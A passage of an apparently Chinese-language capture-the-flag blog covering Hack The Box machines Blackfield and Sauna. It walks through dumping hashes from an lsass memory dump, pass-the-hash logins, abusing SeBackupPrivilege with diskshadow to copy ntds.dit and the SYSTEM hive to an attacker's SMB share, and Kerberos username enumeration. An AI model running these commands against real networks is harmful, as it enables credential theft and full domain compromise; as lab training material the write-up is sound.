<h3 id="Access-check"><a href="#Access-check" class="headerlink" title="Access check"></a>Access check</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ crackmapexec smb 10.10.10.192 -u audit2020 -p 'Password@!!' 130 ⨯</span><br><span class="line">SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)</span><br><span class="line">SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Password@!!:Password@!!</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ crackmapexec winrm 10.10.10.192 -u audit2020 -p 'Password@!!' </span><br><span class="line">SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)</span><br><span class="line">HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman</span><br><span class="line">WINRM 10.10.10.192 5985 DC01 [-] BLACKFIELD.local\audit2020:Password@!!</span><br></pre></td></tr></table></figure>
<h2 id="0x05-audit2020-gt-svc-backup"><a href="#0x05-audit2020-gt-svc-backup" class="headerlink" title="0x05 audit2020->svc_backup"></a>0x05 audit2020->svc_backup</h2><h3 id="Enumration"><a href="#Enumration" class="headerlink" title="Enumration"></a>Enumration</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$ smbmap -H 10.10.10.192 -u audit2020 -p 'Password@!!' </span><br><span class="line">[+] IP: 10.10.10.192:445 Name: 10.10.10.192 </span><br><span class="line"> Disk Permissions Comment</span><br><span class="line"> ---- ----------- -------</span><br><span class="line"> ADMIN$ NO ACCESS Remote Admin</span><br><span class="line"> C$ NO ACCESS Default share</span><br><span class="line"> forensic READ ONLY Forensic / Audit share.</span><br><span class="line"> IPC$ READ ONLY Remote IPC</span><br><span class="line"> NETLOGON READ ONLY Logon server share </span><br><span class="line"> profiles$ READ ONLY</span><br><span class="line"> SYSVOL READ ONLY Logon server share</span><br></pre></td></tr></table></figure>
<p>然后发现<code>forensic</code>共享文件夹中有内存转储信息,其中<code>lsass</code>的内存转储对我们进行进一步的横向移动有很大帮助。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">$ smbclient -U 'audit2020%Password@!!' \\\\10.10.10.192\\forensic</span><br><span class="line">Try "help" to get a list of possible commands.</span><br><span class="line">smb: \> ls</span><br><span class="line"> . D 0 Sun Feb 23 21:03:16 2020</span><br><span class="line"> .. D 0 Sun Feb 23 21:03:16 2020</span><br><span class="line"> commands_output D 0 Mon Feb 24 02:14:37 2020</span><br><span class="line"> memory_analysis D 0 Fri May 29 04:28:33 2020</span><br><span class="line"> tools D 0 Sun Feb 23 21:39:08 2020</span><br><span class="line"></span><br><span class="line"> 5102079 blocks of size 4096. 1599037 blocks available</span><br><span class="line">smb: \> cd memory_analysis</span><br><span class="line">smb: \memory_analysis\> ls</span><br><span class="line"> . D 0 Fri May 29 04:28:33 2020</span><br><span class="line"> .. D 0 Fri May 29 04:28:33 2020</span><br><span class="line"> conhost.zip A 37876530 Fri May 29 04:25:36 2020</span><br><span class="line"> ctfmon.zip A 24962333 Fri May 29 04:25:45 2020</span><br><span class="line"> dfsrs.zip A 23993305 Fri May 29 04:25:54 2020</span><br><span class="line"> dllhost.zip A 18366396 Fri May 29 04:26:04 2020</span><br><span class="line"> ismserv.zip A 8810157 Fri May 29 04:26:13 2020</span><br><span class="line"> lsass.zip A 41936098 Fri May 29 04:25:08 2020</span><br><span class="line"> mmc.zip A 64288607 Fri May 29 04:25:25 2020</span><br><span class="line"> RuntimeBroker.zip A 13332174 Fri May 29 04:26:24 2020</span><br><span class="line"> ServerManager.zip A 131983313 Fri May 29 04:26:49 2020</span><br><span class="line"> sihost.zip A 33141744 Fri May 29 04:27:00 2020</span><br><span class="line"> smartscreen.zip A 33756344 Fri May 29 04:27:11 2020</span><br><span class="line"> svchost.zip A 14408833 Fri May 29 04:27:19 2020</span><br><span class="line"> taskhostw.zip A 34631412 Fri May 29 04:27:30 2020</span><br><span class="line"> winlogon.zip A 14255089 Fri May 29 04:27:38 2020</span><br><span class="line"> wlms.zip A 4067425 Fri May 29 04:27:44 2020</span><br><span class="line"> WmiPrvSE.zip A 18303252 Fri May 29 04:27:53 2020</span><br></pre></td></tr></table></figure>
<h3 id="Extract-Hashes"><a href="#Extract-Hashes" class="headerlink" title="Extract Hashes"></a>Extract Hashes</h3><p>解压<code>lsass.zip</code>后得到一个<code>lsass.dmp</code>的文件,然后利用<code>pypytakz</code>工具进行哈希转储。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">$ pypykatz lsa minidump lsass.DMP > ../../lsadump </span><br><span class="line"></span><br><span class="line">$ cat lsadump |grep username|sort -u</span><br><span class="line">username </span><br><span class="line"> username Administrator</span><br><span class="line">username Administrator</span><br><span class="line"> username DC01$</span><br><span class="line">username DC01$</span><br><span class="line">username DWM-1</span><br><span class="line">username DWM-2</span><br><span class="line">username LOCAL SERVICE</span><br><span class="line"> username svc_backup</span><br><span class="line">username svc_backup</span><br><span class="line">username UMFD-0</span><br><span class="line">username UMFD-1</span><br><span class="line">username UMFD-2</span><br></pre></td></tr></table></figure>
<p>进行简要信息分析后,发现有几个账户的内容,比如<code>svc_backup</code>,<code>Administrator</code>。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$ cat lsadump |grep svc_backup -C 5 </span><br><span class="line">FILE: ======== lsass.DMP ======= </span><br><span class="line">== LogonSession == </span><br><span class="line">authentication_id 406458 (633ba) </span><br><span class="line">session_id 2 </span><br><span class="line">username svc_backup </span><br><span class="line">domainname BLACKFIELD </span><br><span class="line">logon_server DC01 </span><br><span class="line">logon_time 2020-02-23T18:00:03.423728+00:00 </span><br><span class="line">sid S-1-5-21-4194615774-2175524697-3563712290-1413 </span><br><span class="line">luid 406458 </span><br><span class="line"> == MSV == </span><br><span class="line"> Username: svc_backup </span><br><span class="line"> Domain: BLACKFIELD </span><br><span class="line"> LM: NA </span><br><span class="line"> NT: 9658d1d1dcd9250115e2205d9f48400d </span><br><span class="line"> SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c </span><br><span class="line"> DPAPI: a03cd8e9d30171f3cfe8caad92fef621 </span><br></pre></td></tr></table></figure>
<p>获得了svc_backup账号的hash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">svc_backup:9658d1d1dcd9250115e2205d9f48400d</span><br></pre></td></tr></table></figure>
<p>验证凭证,发现可以用winrm登录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ crackmapexec winrm 10.10.10.192 -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'</span><br><span class="line">SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)</span><br><span class="line">HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman</span><br><span class="line">WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)</span><br></pre></td></tr></table></figure>
<p>使用<code>evil-winrm</code>登录主机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i 10.10.10.192 -u $ evil-winrm -i 10.10.10.192 -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'</span><br></pre></td></tr></table></figure>
<p>flag在用户Desktop上</p>
<img src="/undefined/3db8feaa/userflag.png" class="">
<h2 id="0x06-svc-backup-gt-Administrator"><a href="#0x06-svc-backup-gt-Administrator" class="headerlink" title="0x06 svc_backup -> Administrator"></a>0x06 svc_backup -> Administrator</h2><h3 id="Enumeration"><a href="#Enumeration" class="headerlink" title="Enumeration"></a>Enumeration</h3><p>发现账户存在<code>SeBackupPrivilege</code>权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv</span><br><span class="line"></span><br><span class="line">PRIVILEGES INFORMATION</span><br><span class="line">----------------------</span><br><span class="line"></span><br><span class="line">Privilege Name Description State</span><br><span class="line">============================= ============================== =======</span><br><span class="line">SeMachineAccountPrivilege Add workstations to domain Enabled</span><br><span class="line">SeBackupPrivilege Back up files and directories Enabled</span><br><span class="line">SeRestorePrivilege Restore files and directories Enabled</span><br><span class="line">SeShutdownPrivilege Shut down the system Enabled</span><br><span class="line">SeChangeNotifyPrivilege Bypass traverse checking Enabled</span><br><span class="line">SeIncreaseWorkingSetPrivilege Increase a process working set Enabled</span><br></pre></td></tr></table></figure>
<p>这意味着我们可已利用这权限将一些没有权限访问读取的文件备份到一个可写目录下从而使得我们可以越权读取文件。</p>
<p>先上传一些工具</p>
<img src="/undefined/3db8feaa/image-20230509232448021.png" class="">
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> import-module .\SeBackupPrivilegeCmdLets.dll</span><br><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> import-module .\SeBackupPrivilegeUtils.dll</span><br></pre></td></tr></table></figure>
<p>接着我们便可以尝试直接复制root.txt,但是很可惜,我们并不能复制该文件,同样也不能复制<code>ntds.dit</code>文件,因为后者正被另一个进程所使用。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\programdata> Copy-FileSeBackupPrivilege \users\administrator\desktop\root.txt so1.txt</span><br><span class="line">Opening input file. - Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))</span><br><span class="line">At line:1 char:1</span><br><span class="line">+ Copy-FileSeBackupPrivilege \users\administrator\desktop\root.txt 0xdf ...</span><br><span class="line">+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~</span><br><span class="line"> + CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception</span><br><span class="line"> + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\programdata> Copy-FileSeBackupPrivilege C:\Windows\ntds\ntds.dit .</span><br><span class="line">Opening input file. - The process cannot access the file because it is being used by another process. (Exception from HRESULT: 0x80070020)</span><br><span class="line">At line:1 char:1</span><br><span class="line">+ Copy-FileSeBackupPrivilege C:\Windows\ntds\ntds.dit .</span><br><span class="line">+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~</span><br><span class="line"> + CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception</span><br><span class="line"> + FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege</span><br></pre></td></tr></table></figure>
<h3 id="Diskshadow"><a href="#Diskshadow" class="headerlink" title="Diskshadow"></a>Diskshadow</h3><blockquote>
<p>Diskshadow.exe 是一种公开卷影复制服务 (VSS) 提供的功能的工具。 默认情况下,Diskshadow 使用类似于 Diskraid 或 Diskpart 的交互式命令解释器。 Diskshadow 还包括一个脚本模式。 </p>
</blockquote>
<p>此时我们可以利用diskshadow来将c盘挂载到另一个驱动器上,这样我们就可以复制其中的内容达到提权的效果。</p>
<p>两个脚本内容如下</p>
<p>diskshadow.txt</p>
<blockquote>
<p>需要注意的是set metadata可以用于指定<code> .cab</code>文件的存储路径,我们需要使其存储在可写目录下,否则无法成功挂在到另一个驱动器上</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">set context persistent nowriters</span><br><span class="line">add volume c: alias someAlias</span><br><span class="line">set metadata c:\programdata\sol.cab</span><br><span class="line">set verbose on</span><br><span class="line">create</span><br><span class="line">expose %someAlias% z:</span><br><span class="line">reset</span><br></pre></td></tr></table></figure>
<p>delete.txt</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">delete shadows volume z</span><br><span class="line">reset</span><br></pre></td></tr></table></figure>
<p>此时由于运行程序是在windows上,我们需要对文件格式进行处理</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ unix2dos diskshadow.txt</span><br><span class="line">$ unix2dos delete.txt</span><br></pre></td></tr></table></figure>
<p>然后上传到目标主机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> upload /home/sollupus/OSCP/Blackfield/exploit/diskshadow.txt</span><br><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> upload /home/sollupus/OSCP/Blackfield/exploit/delete.txt</span><br></pre></td></tr></table></figure>
<p>然后运行脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> diskshadow /s .\diskshadow.txt</span><br></pre></td></tr></table></figure>
<img src="/undefined/3db8feaa/image-20230509233656418.png" class="">
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> diskshadow /s .\diskshadow.txt</span><br></pre></td></tr></table></figure>
<img src="/undefined/3db8feaa/image-20230509233605284.png" class="">
<p>这样一来,我们就可以获取C盘下的所有内容了</p>
<h3 id="Grab-ntds-dit"><a href="#Grab-ntds-dit" class="headerlink" title="Grab ntds.dit"></a>Grab ntds.dit</h3><p>先在本地开启smbserver,然后直接将ntds.dit文件传输到本地主机上</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> copy-filesebackupprivilege z:\windows\ntds\ntds.dit .</span><br><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> mv .\ntds.dit \\10.10.16.x\share\ntds.dit</span><br></pre></td></tr></table></figure>
<p>然后再将SYSTEM内容传输过来</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> reg save hklm\system</span><br><span class="line">*Evil-WinRM* PS C:\Users\svc_backup\Desktop> mv SYSTEM \\10.10.16.x\share\SYSTEM</span><br></pre></td></tr></table></figure>
<h3 id="Dump-hashes"><a href="#Dump-hashes" class="headerlink" title="Dump hashes"></a>Dump hashes</h3><p>使用secretsdump工具转储hash,成功获取Administrator的hash</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL -o secretsdump</span><br><span class="line">$ cat secretsdump.ntds|grep -i administrator</span><br><span class="line">Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::</span><br></pre></td></tr></table></figure>
<p>然后我们就可以利用各种工具登录目标机器</p>
<img src="/undefined/3db8feaa/image-20230509234412462.png" class="">
<p>root.txt</p>
<img src="/undefined/3db8feaa/rootflag.png" class="">
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="http://example.com/undefined/55527558.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="So1Lupus">
<meta itemprop="description" content="So1Lupus的个人博客">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="So1Lupus">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/undefined/55527558.html" class="post-title-link" itemprop="url">Road-to-OSCP-6-Sauna</a>
</h2>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2023-05-07 22:08:55" itemprop="dateCreated datePublished" datetime="2023-05-07T22:08:55+08:00">2023-05-07</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2024-09-28 20:29:19" itemprop="dateModified" datetime="2024-09-28T20:29:19+08:00">2024-09-28</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<span id="more"></span>
<h1 id="Sauna"><a href="#Sauna" class="headerlink" title="Sauna"></a>Sauna</h1><h2 id="Recon"><a href="#Recon" class="headerlink" title="Recon"></a>Recon</h2><h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"># Nmap 7.93 scan initiated Fri May 5 15:30:30 2023 as: nmap -sC -sV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -oN nmapTcp 10.10.10.175</span><br><span class="line">Nmap scan report for 10.10.10.175</span><br><span class="line">Host is up (0.32s latency).</span><br><span class="line"></span><br><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">53/tcp open domain Simple DNS Plus</span><br><span class="line">80/tcp open http Microsoft IIS httpd 10.0</span><br><span class="line">| http-methods: </span><br><span class="line">|_ Potentially risky methods: TRACE</span><br><span class="line">|_http-server-header: Microsoft-IIS/10.0</span><br><span class="line">|_http-title: Egotistical Bank :: Home</span><br><span class="line">88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-05 14:30:47Z)</span><br><span class="line">135/tcp open msrpc Microsoft Windows RPC</span><br><span class="line">139/tcp open netbios-ssn Microsoft Windows netbios-ssn</span><br><span class="line">389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)</span><br><span class="line">445/tcp open microsoft-ds?</span><br><span class="line">464/tcp open kpasswd5?</span><br><span class="line">593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0</span><br><span class="line">636/tcp open tcpwrapped</span><br><span class="line">3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)</span><br><span class="line">3269/tcp open tcpwrapped</span><br><span class="line">5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)</span><br><span class="line">|_http-server-header: Microsoft-HTTPAPI/2.0</span><br><span class="line">|_http-title: Not Found</span><br><span class="line">9389/tcp open mc-nmf .NET Message Framing</span><br><span class="line">Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows</span><br><span class="line"></span><br><span class="line">Host script results:</span><br><span class="line">|_clock-skew: 7h00m00s</span><br><span class="line">| smb2-security-mode: </span><br><span class="line">| 311: </span><br><span class="line">|_ Message signing enabled and required</span><br><span class="line">| smb2-time: </span><br><span class="line">| date: 2023-05-05T14:31:08</span><br><span class="line">|_ start_date: N/A</span><br><span class="line"></span><br><span class="line">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span><br><span class="line"># Nmap done at Fri May 5 15:31:49 2023 -- 1 IP address (1 host up) scanned in 79.48 seconds</span><br></pre></td></tr></table></figure>
<h3 id="ldap-389"><a href="#ldap-389" class="headerlink" title="ldap - 389"></a>ldap - 389</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">ldapsearch -H ldap://10.10.10.175 -x -s base namingcontext</span><br><span class="line"> </span><br><span class="line">namingcontexts: DC=EGOTISTICAL-BANK,DC=LOCAL</span><br><span class="line">namingcontexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL</span><br><span class="line">namingcontexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL</span><br><span class="line">namingcontexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL</span><br><span class="line">namingcontexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">ldapsearch -x -h 10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL'</span><br><span class="line"></span><br><span class="line">dn: DC=EGOTISTICAL-BANK,DC=LOCAL </span><br><span class="line">objectClass: top</span><br><span class="line">objectClass: domain</span><br><span class="line">objectClass: domainDNS</span><br><span class="line">distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL</span><br><span class="line">instanceType: 5</span><br><span class="line">whenCreated: 20200123054425.0Z</span><br><span class="line">whenChanged: 20200216124516.0Z</span><br><span class="line">subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL</span><br><span class="line">subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL</span><br><span class="line">subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL</span><br><span class="line">...[snip]...</span><br></pre></td></tr></table></figure>
<h3 id="website-80"><a href="#website-80" class="headerlink" title="website -80"></a>website -80</h3><p>find some teammate’s name.</p>
<img src="/undefined/55527558/image-20230507213825194.png" class="">
<h3 id="kerberos-88"><a href="#kerberos-88" class="headerlink" title="kerberos -88"></a>kerberos -88</h3><p>using kerbrute to userenum to get valid user lists. </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175</span><br><span class="line"> __ __ __ </span><br><span class="line"> / /_____ _____/ /_ _______ __/ /____ </span><br><span class="line"> / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \</span><br><span class="line"> / ,< / __/ / / /_/ / / / /_/ / /_/ __/</span><br><span class="line">/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ </span><br><span class="line"></span><br><span class="line">Version: dev (n/a) - 02/15/20 - Ronnie Flathers @ropnop</span><br><span class="line"></span><br><span class="line">2020/02/15 14:41:50 > Using KDC(s):</span><br><span class="line">2020/02/15 14:41:50 > 10.10.10.175:88</span><br><span class="line"></span><br><span class="line">2020/02/15 14:41:59 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2020/02/15 14:42:46 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2020/02/15 14:42:54 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2020/02/15 14:43:21 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2020/02/15 14:47:43 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2020/02/15 16:01:56 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2020/02/16 03:13:54 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2020/02/16 03:13:54 > [+] VALID USERNAME: [email protected]</span><br><span class="line">2020/02/16 03:24:34 > Done! Tested 8295455 usernames (8 valid) in 17038.364 seconds</span><br></pre></td></tr></table></figure>
<h2 id="Shell-as-fsmith"><a href="#Shell-as-fsmith" class="headerlink" title="Shell as fsmith"></a>Shell as fsmith</h2><h3 id="AS-REP-Roasting"><a href="#AS-REP-Roasting" class="headerlink" title="AS-REP Roasting"></a>AS-REP Roasting</h3><p>get-hash</p>
